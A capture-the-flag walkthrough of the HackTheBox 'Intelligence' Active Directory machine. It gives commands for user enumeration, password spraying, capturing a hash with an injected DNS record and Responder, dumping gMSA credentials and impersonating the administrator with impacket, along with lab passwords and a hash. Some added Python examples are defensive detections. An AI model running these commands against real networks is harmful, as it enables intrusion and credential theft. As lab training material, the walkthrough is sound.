Intelligence HackTheBox Walkthrough | Active Directory

D3athCod3
6 min read · Jun 15, 2024

Scanning

Let’s start scanning using nmap

nmap -p- -sV -sC -A 10.10.10.248

The scan shows a number of open ports and the domain name, intelligence.htb. I added the domain and the server IP to my /etc/hosts file.

Let’s start enumerating

Accessing & Enumerating Port 80

After accessing port 80 we get this web page

After going through the whole page, I found two PDF files.

I downloaded them using wget, but sadly I was not able to understand the language of the file content. I then decided to extract the file metadata using exiftool.

exiftool 2020-01-01-upload.pdf

Here I saw a username in the Creator field. I tried verifying whether this user exists in the AD environment using kerbrute.

I saved this username in a file named user.txt and ran it through kerbrute's userenum feature.

./kerbrute userenum -v --dc 10.10.10.248 -d intelligence.htb user.txt

This turned out to be a valid username, which means the Creator field holds usernames.

I did the same with the second PDF and found another user named Jose.Williams.

I checked whether any user had preauthentication disabled using impacket-GetNPUsers, but found nothing :(

I tried bruteforcing the SMB password for this user but had no luck. Then I tried enumerating LDAP and DNS, but no luck either :(

Then I went back to the website and found that we can’t directly access /documents, but we can fuzz for more PDFs because the file names follow the format YYYY-MM-DD-upload.pdf

URL: http://intelligence.htb/documents/

I created a Python script that first checks whether a PDF exists for each month and day and, if it exists, downloads it to my system.

import requests

# Base URL to check the existence of the PDF
base_url = "http://intelligence.htb/documents/"

# Loop through all months (01 to 12)
for month in range(1, 13):
    # Format the month to two digits
    month_str = f"{month:02d}"

    # Loop through all days (01 to 31)
    for day in range(1, 32):
        # Format the day to two digits
        day_str = f"{day:02d}"

        # Create the filename
        filename = f"2020-{month_str}-{day_str}-upload.pdf"

        # Full URL
        url = base_url + filename

        # Check if the file exists
        response = requests.head(url)

        if response.status_code == 200:
            print(f"File found: {filename}. Downloading...")
            # If it exists, download the file
            response = requests.get(url)
            with open(filename, 'wb') as f:
                f.write(response.content)
        else:
            print(f"File not found: {filename}")

After running this script I got a bunch of PDFs :( lots of work
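Seen from the defender's side, a sweep like this stands out in web server logs: one client requests many distinct date-named files under /documents/ and most of them return 404. The following is an added example, not part of the original post, that flags this pattern over constructed access-log lines; the Common Log Format layout, the thresholds and the client addresses are assumptions.

```python
import re
from collections import defaultdict

# Common Log Format: client, timestamp, request line, status (assumed layout)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# File naming scheme described on the page: YYYY-MM-DD-upload.pdf
DOC_RE = re.compile(r'^/documents/(\d{4}-\d{2}-\d{2})-upload\.pdf$')

def find_enumerators(lines, min_distinct=20, min_miss_ratio=0.5):
    """Return {ip: stats} for clients sweeping date-named documents."""
    seen = defaultdict(set)     # ip -> distinct dates requested
    missed = defaultdict(set)   # ip -> distinct dates answered with 404
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines
        d = DOC_RE.match(m["path"].split("?", 1)[0])
        if not d:
            continue  # not a date-named document request
        seen[m["ip"]].add(d.group(1))
        if m["status"] == "404":
            missed[m["ip"]].add(d.group(1))
    flagged = {}
    for ip, dates in seen.items():
        ratio = len(missed[ip]) / len(dates)
        if len(dates) >= min_distinct and ratio >= min_miss_ratio:
            flagged[ip] = {"distinct": len(dates), "miss_ratio": round(ratio, 2)}
    return flagged

def sample_log():
    """Constructed sample: one sweeping client and one ordinary visitor."""
    hits = {"2020-01-01", "2020-01-02", "2020-01-04", "2020-01-10"}
    lines = ["garbage line"]
    for day in range(1, 32):
        name = f"2020-01-{day:02d}"
        status = 200 if name in hits else 404
        lines.append(
            f'203.0.113.7 - - [15/Jun/2024:10:00:{day:02d} +0000] '
            f'"HEAD /documents/{name}-upload.pdf HTTP/1.1" {status} 0'
        )
    lines.append('198.51.100.9 - - [15/Jun/2024:10:01:00 +0000] '
                 '"GET /documents/2020-01-01-upload.pdf HTTP/1.1" 200 26835')
    return lines

if __name__ == "__main__":
    print(find_enumerators(sample_log()))
```
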

Here I decided to extract all usernames from the PDFs and store them in a file named user.txt. Instead of exiftool, this command runs strings over all the PDFs, extracts every Creator name and stores them in a file.

cat *.pdf | strings | grep Creator | cut -d '(' -f 2 | cut -d ')' -f 1 | grep -v Tex | grep -v TeX > user.txt
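The same Creator field can be checked before a document is published. The following is an added example, not part of the original post, of a pre-publication check that reads the Creator and Author entries from raw PDF bytes and reports values that look like directory account names; the First.Last naming convention, the function names and the sample bytes are assumptions, and metadata stored in compressed object streams or as hex strings is not covered.

```python
import re

# Literal PDF string after the key, e.g. /Creator (value); escaped parens allowed.
FIELD_RE = re.compile(rb"/(Creator|Author)\s*\(((?:\\.|[^\\()])*)\)")
# Assumption: account names follow the First.Last convention seen on the page.
ACCOUNT_RE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")

# Constructed sample inputs (not real documents).
SAMPLE_LEAKY = (b"%PDF-1.5\n1 0 obj\n"
                b"<< /Creator (Jose.Williams) /Producer (pdfTeX-1.40.21) >>\nendobj\n")
SAMPLE_CLEAN = (b"%PDF-1.5\n1 0 obj\n"
                b"<< /Creator (TeX) /Producer (pdfTeX-1.40.21) >>\nendobj\n")


def metadata_fields(pdf_bytes):
    """Yield (field, value) for uncompressed Creator/Author entries."""
    for m in FIELD_RE.finditer(pdf_bytes):
        value = re.sub(rb"\\(.)", rb"\1", m.group(2))  # undo backslash escapes
        yield m.group(1).decode(), value.decode("latin-1")


def leaks(pdf_bytes):
    """Return metadata entries whose value looks like an account name."""
    return [(f, v) for f, v in metadata_fields(pdf_bytes) if ACCOUNT_RE.match(v)]


if __name__ == "__main__":
    for label, data in (("leaky", SAMPLE_LEAKY), ("clean", SAMPLE_CLEAN)):
        print(label, leaks(data) or "no account-like metadata")
```
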

Now I tried to find any user with preauthentication disabled so we can grab its TGS ticket using impacket-GetNPUsers

impacket-GetNPUsers  -dc-ip 10.10.10.248 intelligence.htb/ -usersfile user.txt -no-pass

But found none :(

Then I decided to check the content of all the PDFs. To make it easy, I uploaded all of them to https://smallpdf.com/ so I could see them on one page.

After going through all the pages, I found a PDF that contains a cleartext password.

Now we have a user list and a password. I tried password spraying against the samba service using crackmapexec

crackmapexec smb 10.10.10.248 -u user.txt -p "NewIntelligenceCorpUser9876"

Got a valid username with which we can use the found password :)

Using smbclient, I listed the shares available to this user

smbclient -L //10.10.10.248 --user Tiffany.Molina

Now, using the Users share with smbclient and the credentials, I gained access over SMB

smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876

and inside Desktop I found the user.txt flag :)

Then I accessed the IT share and found a script named downdetector.ps1

I downloaded this PowerShell script to my local system and read its content

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

The script checks the status of web servers whose DNS records start with “web” and sends an email from the Ted Graves user if any of these servers is down. Because the request is made with -UseDefaultCredentials, it authenticates as the account running the script.

Here we can perform MITM and grab this user's hash using the krbrelayx script dnstool.py and responder.

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'webprooplayer' -d 10.10.14.34 10.10.10.248

Now run responder on the tun0 interface and after 5 min you’ll get the Ted Graves user's hash

sudo responder -I tun0
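The weakness used here is that the scheduled script trusts every DNS name starting with "web" and authenticates to it. The following is an added example, not part of the original post, of a defender-side audit that takes an export of the zone's A records and reports the ones the script would contact that point outside the expected server range or are not in a reviewed baseline; the allowed subnet, the baseline and the records other than the one added above are constructed assumptions.

```python
import fnmatch
import ipaddress

# Assumption: the only subnet where legitimate web servers live.
ALLOWED_NETS = [ipaddress.ip_network("10.10.10.0/24")]

# Constructed zone export: (record name, A record address).
SAMPLE_RECORDS = [
    ("web1", "10.10.10.20"),
    ("webprooplayer", "10.10.14.34"),   # record added with dnstool.py above
    ("dc", "10.10.10.248"),
    ("webmail", "10.10.10.21"),
]


def audit_records(records, pattern="web*", allowed=ALLOWED_NETS, baseline=()):
    """Return findings for A records the health-check script would contact.

    records:  iterable of (name, ip) pairs exported from the DNS zone.
    baseline: record names that were already reviewed and approved.
    """
    findings = []
    approved = {n.lower() for n in baseline}
    for name, ip in records:
        if not fnmatch.fnmatch(name.lower(), pattern):
            continue  # the script ignores names that do not match web*
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((name, ip, "unparseable address"))
            continue
        reasons = []
        if not any(addr in net for net in allowed):
            reasons.append("address outside allowed server ranges")
        if name.lower() not in approved:
            reasons.append("name not in approved baseline")
        if reasons:
            findings.append((name, ip, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for finding in audit_records(SAMPLE_RECORDS, baseline=("web1",)):
        print(finding)
```
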

I cracked this hash using John the Ripper

We now have Ted's password but are still unable to log on anywhere :(

I didn’t find anything useful in SMB either. Then I decided to run bloodhound-python to enumerate the user privileges.

bloodhound-python -c All -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -ns 10.10.10.248 --zip

I uploaded the zip file into BloodHound, then I marked Tiffany.Molina & Ted.Graves as owned.

After a little analysis I found this:

The itsupport group has ReadGMSAPassword over the svc_int user. A little searching on Google got me to a GitHub page: https://github.com/micahvandeusen/gMSADumper

I cloned this repository and used it to try to dump the svc_int TGT hash

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

I got this TGT hash of svc_int

Pass The Ticket (PTT)

After a little searching I found a blog that shows getTGT.py (an impacket script), which we can use to request a service ticket for the administrator user.

impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator

After trying this I got an error, i.e. Clock skew too great.

I searched for this on Google and found a Medium blog that worked like a charm for me :)

I followed the same steps and it started working

Steps I followed:

su
timedatectl set-ntp off
rdate -n 10.10.10.248
impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator

Then I tried using this with psexec but it didn’t work :) Stuck again.

Later I found out that impacket has a script named atexec that we can use to remotely execute commands. For this I exported the administrator user's service ticket

export KRB5CCNAME=administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache

Then, using atexec, I executed the whoami command

Now, replacing whoami with type and the root flag location, I grabbed the root.txt flag :)

Intelligence Machine Solved Successfully!!

D3athCod3 is a CTF team dedicated to honing and showcasing top-tier cybersecurity skills.